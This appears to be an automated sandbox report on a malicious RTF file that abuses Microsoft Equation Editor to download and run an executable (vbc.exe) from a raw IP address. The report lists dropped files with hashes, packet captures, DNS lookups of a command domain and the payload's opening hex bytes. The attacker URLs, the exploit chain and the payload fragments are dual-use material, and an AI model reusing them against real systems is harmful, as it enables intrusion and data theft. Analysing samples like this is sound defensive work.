                              Preview: ..'.6...3.>.0.<.5.?.%.[.|._.3.'.7.4.?.~./.^...3.:.0.7.:.`.*.&.'.2.%.~.%./.>.0.2.?.^.0.`.9.2.@.'.%.=.?.>.$.!.0.>.5...9.?._.9.,.?.`.<...^...)...8.9.6._.5./.(.?.*.,.5.=...?.).?.9.4.?.^...9.?.<.&.4...,.~._.-.'.].+.!.+.0.?...5.9.0.9.?.3.0.`.].%.[.&.1.+.*.2...*.&.?.`.3.......?.:.|.#.1._./.|.....(.>.'.#.2.2.?.(.(.7.1.`.!.2.@.4.5.7.6.?.|.:.2.1.?.?.?.'.`.5.%.<...%.,./.6.~.^.9.0...^.0.#.^.-.,.>.*.?.].....*.@...*.[.?.[.?././.7.$.).8.0...`.`.1.1.5.0.].......(.=.#.8.|.0...%.@.6.!.?.'.?.^.(.?.@.+.'.'.^.?.:.!.6.'.?.:.9.^.<.6.1.=...>.|.~.].`.,.%.@.0.0.+.%.=.-.:...:.?.;.6.`.].#.7.`...-.^.>...-.?.`.<.?...?.?._./.>.(.?./.1.&.5.2.%.!.`.<.3...?...*.;...?.2.7.`.-.@.0.3.+...8.6.%.8.8.1.*.:.1.%...5.6.#.-...].6.(.*.6.:...5.%.-.^.0.>.#.?.#...`.~.3.$.@.?.......~.+...8...<...5.:.<.|.7.:.>.%./.2.`.+.3.6.;.|.6.?.^.(.<.6...^.7.?.?.<.*./.1...?.8...%.^.'.#.%.`.?...?.*.%.^.0.?.?.3.4.:.?.-...|./.0.[.7...].2._.*.$.1.~.|.8.?.9.'...=.?.+.'.9.1.8.&.3...1.6.+.;.;.+.%.#.~.%.#.>./.].:.<.5.3.8.+.].1.....^.7.'.:...?.[.?.!.!.2.?.
                              C:\Users\user\AppData\Local\Temp\Cab6BEE.tmp
                              Process:C:\Users\Public\vbc.exe
                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                              Category:dropped
                              Size (bytes):58936
                              Entropy (8bit):7.994797855729196
                              Encrypted:true
                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                              MD5:E4F1E21910443409E81E5B55DC8DE774
                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                              C:\Users\user\AppData\Local\Temp\Tar6BEF.tmp
                              Process:C:\Users\Public\vbc.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):152533
                              Entropy (8bit):6.31602258454967
                              Encrypted:false
                              SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                              MD5:D0682A3C344DFC62FB18D5A539F81F61
                              SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                              SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                              SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\8825358c-c9a2-4b41-9da6-2ff1c62969d9.LNK
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 3 16:53:39 2020, mtime=Thu Dec 3 16:53:39 2020, atime=Thu Dec 3 16:53:42 2020, length=9525, window=hide
                              Category:dropped
                              Size (bytes):2288
                              Entropy (8bit):4.535816613471708
                              Encrypted:false
                              SSDEEP:48:8T/XT0ZVXBqfvVzl/Qh2T/XT0ZVXBqfvVzl/Q/:8T/XuVXI5l/Qh2T/XuVXI5l/Q/
                              MD5:7E0AF6FC67877C4A3321E258E6C22B6E
                              SHA1:0B5BA46AFD941F9CE4A31B05DAA5998ADD97A7D9
                              SHA-256:A1D7720A0489367A45BE6CD96DC72118BB2CB39D593C536E699F192E29E73958
                              SHA-512:B745DDA634756A59FF829AC56F62B2E4E9BA627D273F09C717500F316D8ACED318EDD89114B059153D9837B78D75AD0E947486682A5E17518F2582A7FB3F3F3B
                              Malicious:false
                              Reputation:low
                              Preview: L..................F.... ....@.;.....@.;......<....5%...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q....Desktop.d......QK.X.Q..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.5%...Q.. .882535~1.RTF..~......Q...Q..*...?.....................8.8.2.5.3.5.8.c.-.c.9.a.2.-.4.b.4.1.-.9.d.a.6.-.2.f.f.1.c.6.2.9.6.9.d.9...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\888683\Users.user\Desktop\8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf.?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.8.8.2.5.3.5.8.c.-.c.9.a.2.-.4.b.4.1.-.9.d.a.6.-.2.f.f.1.c.6.2.9.6.9.d.9...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.
                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):148
                              Entropy (8bit):4.479237907692799
                              Encrypted:false
                              SSDEEP:3:Ha2KE+OppFoAZKE+OppFomxWa2KE+OppFov:HDWu37Wu3WWu3y
                              MD5:1A1E5F73CF770AFD5B8E72312BBAD02A
                              SHA1:ACF798E795BF3854D454CC90F2EF8D0BB63C4560
                              SHA-256:0B34DE3AA9A51136EE77848CA635A77152F37F320D97E2FB87773DC5C912E9D8
                              SHA-512:DE47E93D349BFE0897BC742B2620109934A6F2FB703004AAE5F01A9A7124BC130875A3FE9D6EE91207F39BF74837996B1593066BBA2D23502C2F5646009F9A56
                              Malicious:false
                              Preview: [misc]..8825358c-c9a2-4b41-9da6-2ff1c62969d9.LNK=0..8825358c-c9a2-4b41-9da6-2ff1c62969d9.LNK=0..[misc]..8825358c-c9a2-4b41-9da6-2ff1c62969d9.LNK=0..
                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):162
                              Entropy (8bit):2.431160061181642
                              Encrypted:false
                              SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                              MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                              SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                              SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                              SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                              Malicious:false
                              Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                              C:\Users\user\Desktop\~$25358c-c9a2-4b41-9da6-2ff1c62969d9.rtf
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):162
                              Entropy (8bit):2.431160061181642
                              Encrypted:false
                              SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                              MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                              SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                              SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                              SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                              Malicious:false
                              Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                              C:\Users\user\Screenshot.BMP
                              Process:C:\Users\Public\vbc.exe
                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 24
                              Category:modified
                              Size (bytes):428611326
                              Entropy (8bit):4.046441143551136
                              Encrypted:false
                              SSDEEP:
                              MD5:0C64378877941C44706E255935E00980
                              SHA1:846242636FB6E477766F54CBA2C388D5B267BA1A
                              SHA-256:6AE6F8B7B8B90234E7EE28B6E2D8DEB943AF36A747C0084CDE51B0FF8F90E9D8
                              SHA-512:08D647A95725B566A969C9FA6597CA0659355F8329B752B257A3D2F7BA4A14CDB15472886CB9474C4FFD23B0DA44D25954D3B07706CD1F1304EA572A8100809B
                              Malicious:false
                              Preview: BM6.<.....6...(.....................<..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................~.texi[whZvgZtfXteXs
                              C:\Users\user\recommended.4NN
                              Process:C:\Users\Public\vbc.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):579
                              Entropy (8bit):5.238526242669734
                              Encrypted:false
                              SSDEEP:12:jYLm7tHn3WyKm+9WuC6xl8OWuC6xl9WuC6xlReOWuC6xlPUL6xlr:jYadmf9ZCel8OZCel9ZCelRHZCelPULK
                              MD5:54FDEA8195444A1990A324A661D9D945
                              SHA1:637B5E43556CFD65FF83A0D545F4E69CEF00FC46
                              SHA-256:15D37B708680C5E8BF5C4236256A16CF424405B38CCF861E5C2D2DCEFFBC9145
                              SHA-512:883C6066FEBF08361257FD2557A83952745023E2EE462BC6F0EFD33EED9439A91536403DB6B362AE5243D92A1F15579DBCF538A4A336145DA0A75B6D388436AA
                              Malicious:false
                              Preview: Started: 12/3/2020 9:53:53 AM....User Name: user..Computer Name: user-PC....[9:53:53 AM]<<Program Manager>>...[9:54:03 AM]<<Program Manager>>...[9:54:09 AM]<<8825358c-c9a2-4b41-9da6-2ff1c62969d9 [Compatibility Mode] - Microsoft Word>>...[9:54:12 AM]<<8825358c-c9a2-4b41-9da6-2ff1c62969d9 [Compatibility Mode] - Microsoft Word>>...[9:54:16 AM]<<8825358c-c9a2-4b41-9da6-2ff1c62969d9 [Compatibility Mode] - Microsoft Word>>...[9:54:30 AM]<<8825358c-c9a2-4b41-9da6-2ff1c62969d9 [Compatibility Mode] - Microsoft Word>>...[9:54:33 AM]<<imgs [Compatibility Mode] - Microsoft Word>>...
                              C:\Users\Public\vbc.exe
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):57344
                              Entropy (8bit):4.885327146725006
                              Encrypted:false
                              SSDEEP:768:slMzNO4SKo/DI4CmCYFbze9YYgP9fSDpoDRF0aWzJUNYC7LDnD:ZsIRm1xYgP9gpoDRF0aWzpwnD
                              MD5:36A1FE92A6D16E8B6EF766C06B7D9300
                              SHA1:B929411D87973BDB1EAE867036488527C06A5EAF
                              SHA-256:F58FBC11BBF63FA27F08450AEBED92C1A7B48BB0B4A2140453A0D6A14A7CA67F
                              SHA-512:B77F83EE7A0DDDF192177C5AAACB8E383FC5C34C116C39CCA411E9915E3D5DB4E38407EBD7176180C864987AE84968B271C1FA204FE28584CD0FABDDDE58C98D
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....cO..................... ....................@..................................J..........................................(.......4...................................................................(... ....................................text............................... ..`.data...P...........................@....rsrc...4...........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:Rich Text Format data, unknown version
                              Entropy (8bit):5.44551816516567
                              TrID:
                              • Rich Text Format (5005/1) 55.56%
                              • Rich Text Format (4004/1) 44.44%
                              File name:8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf
                              File size:9525
                              MD5:a0d200834b8e4bce46520a97dd468053
                              SHA1:c6e2c6ca63e3d377b2b7347ba4e2ad071f41e162
                              SHA256:2d81518e22ec06dbc7091008d55481d35fe15b3ebc931ad6960759ab11e8d4c0
                              SHA512:f0d95e18cc50d954b2f4cd1d2c1802e4452d631fc43ebaaf7183f4472350e069ee775044976e8662df4701dcadcee4657bf739047e1b3cb92851923f94457d17
                              SSDEEP:192:OPRVnQEl36HYtIN3gFvOm3JjhOgQFZ93DhfKiRcg+xj4+:URVnQElq4tIeROm3XiX1DhCab+Zn
                              File Content Preview:{\rtf27268.'6.3>0<5?%[|_3'74?~/^.3:07:`*&'2%~%/>02?^0`92@'%=?>$!0>5.9?_9,?`<.^.).896_5/(?*,5=.?)?94?^.9?<&4.,~_-']+!+0?.5909?30`]%[&1+*2.*&?`3...?:|#1_/|..(>'#22?((71`!2@4576?|:21???'`5%<.%,/6~^90.^0#^-,>*?]..*@.*[?[?//7$)80.``1150]...(=#8|0.%@6!?'?^(?@+'

                              File Icon

                              Icon Hash:e4eea2aaa4b4b4a4

                              Static RTF Info

                              Objects

                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                              0000010D6hno

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Dec 3, 2020 09:53:54.371937037 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:54.543756962 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.543838978 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:54.544224977 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:54.716717958 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.716758966 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.716797113 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.716835022 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.716900110 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:54.716928005 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:54.888851881 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.888896942 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.888910055 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.888923883 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.889062881 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:54.889120102 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.889143944 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.889189005 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:54.889206886 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.889229059 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:54.889275074 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:54.889302969 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.060990095 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061022997 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061041117 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061060905 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061064005 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061095953 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061100006 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061323881 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061351061 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061371088 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061379910 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061394930 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061419964 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061435938 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061445951 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061454058 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061470032 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061491013 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061506987 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061544895 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061570883 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061594009 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061594963 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061604977 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061619043 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061625004 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061644077 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061661005 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061669111 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.061676979 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.061705112 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.062144041 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.232789993 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.232829094 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.232841969 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.232887030 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.233032942 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.233691931 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.233721018 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.233733892 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.233746052 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.233820915 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.233853102 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.233899117 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.233912945 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.233916044 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.233937979 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.233954906 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.233982086 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.233997107 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.234014988 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.234045029 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.234055042 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.234059095 CET8049165144.168.239.55192.168.2.22
                              Dec 3, 2020 09:53:55.234081030 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.234105110 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.234386921 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:53:55.583782911 CET4916580192.168.2.22144.168.239.55
                              Dec 3, 2020 09:54:00.040923119 CET4916680192.168.2.22213.239.204.60
                              Dec 3, 2020 09:54:00.063386917 CET8049166213.239.204.60192.168.2.22
                              Dec 3, 2020 09:54:00.063477039 CET4916680192.168.2.22213.239.204.60
                              Dec 3, 2020 09:54:00.064743042 CET4916680192.168.2.22213.239.204.60
                              Dec 3, 2020 09:54:00.087145090 CET8049166213.239.204.60192.168.2.22
                              Dec 3, 2020 09:54:00.087563992 CET8049166213.239.204.60192.168.2.22
                              Dec 3, 2020 09:54:00.087620020 CET4916680192.168.2.22213.239.204.60
                              Dec 3, 2020 09:54:00.136719942 CET49167443192.168.2.22213.239.204.60
                              Dec 3, 2020 09:54:00.159252882 CET44349167213.239.204.60192.168.2.22
                              Dec 3, 2020 09:54:00.159336090 CET49167443192.168.2.22213.239.204.60
                              Dec 3, 2020 09:54:00.234510899 CET49167443192.168.2.22213.239.204.60
                              Dec 3, 2020 09:54:00.256931067 CET44349167213.239.204.60192.168.2.22
                              Dec 3, 2020 09:54:00.257050037 CET44349167213.239.204.60192.168.2.22
                              Dec 3, 2020 09:54:00.257071018 CET44349167213.239.204.60192.168.2.22
                              Dec 3, 2020 09:54:00.257096052 CET44349167213.239.204.60192.168.2.22
                              Dec 3, 2020 09:54:00.257112980 CET44349167213.239.204.60192.168.2.22
                              Dec 3, 2020 09:54:00.257147074 CET49167443192.168.2.22213.239.204.60
                              Dec 3, 2020 09:54:00.257170916 CET49167443192.168.2.22213.239.204.60
                              Dec 3, 2020 09:54:00.257173061 CET49167443192.168.2.22213.239.204.60
                              Dec 3, 2020 09:54:00.258285999 CET44349167213.239.204.60192.168.2.22

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Dec 3, 2020 09:53:59.951837063 CET5219753192.168.2.228.8.8.8
                              Dec 3, 2020 09:54:00.008902073 CET53521978.8.8.8192.168.2.22
                              Dec 3, 2020 09:54:01.417422056 CET5309953192.168.2.228.8.8.8
                              Dec 3, 2020 09:54:01.444550037 CET53530998.8.8.8192.168.2.22
                              Dec 3, 2020 09:54:01.455032110 CET5283853192.168.2.228.8.8.8
                              Dec 3, 2020 09:54:01.482151985 CET53528388.8.8.8192.168.2.22

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Dec 3, 2020 09:53:59.951837063 CET192.168.2.228.8.8.80xbdabStandard query (0)aap-ef.comA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Dec 3, 2020 09:54:00.008902073 CET8.8.8.8192.168.2.220xbdabNo error (0)aap-ef.com213.239.204.60A (IP address)IN (0x0001)

                              HTTP Request Dependency Graph

                              • 144.168.239.55
                              • aap-ef.com

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.2249165144.168.239.5580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              TimestampkBytes transferredDirectionData
                              Dec 3, 2020 09:53:54.544224977 CET0OUTGET /win/Apocalypst.exe HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: 144.168.239.55
                              Connection: Keep-Alive
                              Dec 3, 2020 09:53:54.716717958 CET1INHTTP/1.1 200 OK
                              Date: Thu, 03 Dec 2020 08:53:54 GMT
                              Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                              Last-Modified: Wed, 02 Dec 2020 14:26:58 GMT
                              ETag: "e000-5b57c093254ad"
                              Accept-Ranges: bytes
                              Content-Length: 57344
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: application/x-msdownload
                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 a8 63 4f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 00 00 00 20 00 00 00 00 00 00 a0 11 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 02 00 09 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 10 00 00 b4 4a 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 af 00 00 28 00 00 00 00 d0 00 00 34 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 a2 00 00 00 10 00 00 00 b0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 50 0a 00 00 00 c0 00 00 00 10 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 34 0c 00 00 00 d0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 